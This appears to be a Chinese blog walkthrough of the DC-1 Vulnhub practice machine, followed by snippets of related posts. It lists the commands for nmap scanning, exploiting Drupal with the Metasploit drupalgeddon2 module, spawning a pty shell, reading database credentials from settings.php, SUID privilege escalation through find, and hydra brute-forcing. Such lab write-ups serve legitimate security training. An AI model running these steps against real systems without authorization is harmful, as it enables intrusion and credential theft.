DC-1靶机

最新推荐文章于 2024-08-02 18:51:42 发布
最新推荐文章于 2024-08-02 18:51:42 发布
阅读量294 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52525624/article/details/123121021
版权

nmap -sP 192.168.1.0/24

然后找到咱们的靶机

nmap -sV -Pn -n 192.168.1.57

访问该站点并查看robots.txt敏感文件

 

 依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号

 

 

寻找drupal 7.X版本漏洞,并进行利用

2:使用MSF搜索相关模块并进行利用

Search drupal

Use exploit/unix/webapp/drupal_drupalgeddon2

Set RHOST 192.168.1.57

Run

 

使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

 

在网站根目录下发现Flag1.txt文件,查看提示寻找站点的配置文件

 

 

Drupal的默认配置文件为/var/www/sites/default/settings.php并查看

 

6:根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手

然后我们再开启一个终端,进入msfconsole

Use exploit/unix/webapp/drupal_drupalgeddon2

Set RHOST 192.168.1.57

Run

7:在此我们可以参考官方文档对drupal置换密码,参考链接

站点路径下执行:php scripts/password-hash.sh 新密码

8:登录网站,搜索发现Flag3,并根据提示需要进行SUID提权

### 权限提升

1:根据提示-exec,可能会是SUID提权,在此使用find命令查找suid权限的可执行二进制程序

find / -perm -4000 2>/dev/null

2:对find命令进行测试并获取root权限

如果报错,输入 touch 666

3:查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破

4:回到root用户家目录发现Flag5

到此结束!

月隐柳梢幻玉笙
关注
DC-1靶机(新手村)
weixin_42238862的博客
02-14 1万+
今天开始呢,我打算开始一系列的渗透测试靶机教程,有不足的地方,希望大佬抬手轻喷!毕竟学生党写这个也就是为了记录一下自己渗透测试过程中学到的东西,希望能帮助刚刚进来的同学!!!不多说我们开始今天的DC-1靶机 首先呢当然是进行信息收集,信息收集当然得先去看看对面是谁了呀,都不知道对面是谁怎么打它对不对,知道对面是谁就是确定目标机的IP地址,那我起手就是arp-scan进行探测局域网内存活的主机了呀! 至于为什么判断这个是目标机的原因就很简单了,我们对每个IP的信息进行分析,xiaomi自然就是我得虚拟手机了
DC-1靶机渗透笔记
qq_60600840的博客
08-08 260
DC-1靶机安全、渗透、靶机
DC-1 靶机
m0_56171651的博客
08-16 158
DC-1靶机渗透复现
DC1--靶机实操详解
最新发布
qq_61802750的博客
08-02 613
111端口是一个rpcbind 2-4服务,这个服务存在一个漏洞,该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放;特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取隐藏中的东西。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。一个是修改admin的密码,一个是增加一个admin权限的用户。
DC1-靶机
Au
07-31 9537
环境搭建 DC系列目前总共有9个靶机,本靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。 将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件) 配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 靶机开机后是一个登陆页面,无法得知ip 环境 kali:192.1...
dc-1靶机
qq_63267612的博客
09-28 1330
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC:1靶机
黑锤的博客
11-25 433
这个靶机有五个flag,适合初学者,我没管那么多,反正直接拿到root权限就可以了。 下载地址自己去Google吧。 环境搭建好之后,第一步还是老样子,主机发现:netdiscover -r 192.168.233.0/24 得到主机的ip为192.168.233.144 进一步用nmap扫一遍,在扫的同时可以访问他的ip去看看。nmap -sS -A 192.168.233.0/24 看到...
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1156
dc-1靶机详细获取flag过程新手勿喷
复现DC-1靶机.pdf
03-22
1. 使用虚拟机(VM)技术进行靶机复现:文档描述了如何通过虚拟机安装和打开一个名为DC-1的靶机(靶场),具体是指利用VMware这样的虚拟化软件来加载一个名为DC-1.ova的虚拟机文件,从而建立一个安全的测试环境。...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-1 靶机安装及练习
weixin_45451139的博客
01-24 2089
1. 靶机下载安装 下载地址:DC-1 下好后,进行解压,得到一个 .ova 文件, 注意导入后将虚拟机的网络模式由桥接模式改为NAT模式 安装好后虚拟机界面如图: 2. 进行练习 2.1获取flag1文件 首先打开kali机,因为该靶机和kali在同一网段下,因此现在kali中输入ifconfig 进行查看kali机所在网段 由图可知,该kali机ip为192.168.220.128, 因此所在网段为192.168.220.0 然后,用nmap进行扫描该网段: nmap -sP 192.168.2
Vulnhub靶机 DC-1
菜浪马废的博客
03-19 302
查找靶机IP 扫描本地,254是Kali,那138就是DC-1 arp-scan -l 对DC-1进行端口扫描 发现开放80端口,进浏览器查看一下 nmap -sV 192.168.0.138 发现CMD是Drupal 漏洞查找 msfconsole 启动msf search drupal 查找drupal漏洞 看到最新的是2019-02-20,但是等级是normal,还是用2018-...
DC系列靶机DC-1
weixin_53067829的博客
07-01 1035
DC系列靶机
vulnhub之DC1靶机
LainWith的博客
08-15 1286
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
063 渗透测试实战,靶机 DC-1
鸡蛋炒鸡蛋
04-23 3032
文章目录一:准备阶段二:flag1三:flag2四:flag3五:flag4六:flag5 一:准备阶段 DC-1下载与安装 下载:点我 安装: 下载之后进行解压,得到.ova文件 右键选择VMware打开, 选择路径,导入虚拟机,若出现下图情况,先点击取消,然后把vmware正处于开启状态的虚拟机关闭或者选择挂起。再重新选择路劲,导入虚拟机,若还是出现下图内容,则点击重试即可。 安装完成 点击编辑虚拟机 二:flag1 三:flag2 四:flag3 五:flag4 六:flag5 ...
靶机实战(DC-1)
weixin_45605313的博客
06-01 484
DC-1实验环境实验过程信息收集主机发现端口扫描目录扫描网站指纹漏洞发现漏洞利用提权总结 实验环境 靶机DC-1 测试机:kali(IP:192.168.238.143),win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.158 端口扫描 目录扫描 主页面 网站指纹 searchsploit 搜索网站框架漏洞 漏洞发现 使用add admin user 添加一个用户:abcd :abcd 成功登录 也可利用msf框架执行命令 漏洞利用 设置参数 拿到一个
DC-1靶机教程
qq_42553928的博客
04-07 5292
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值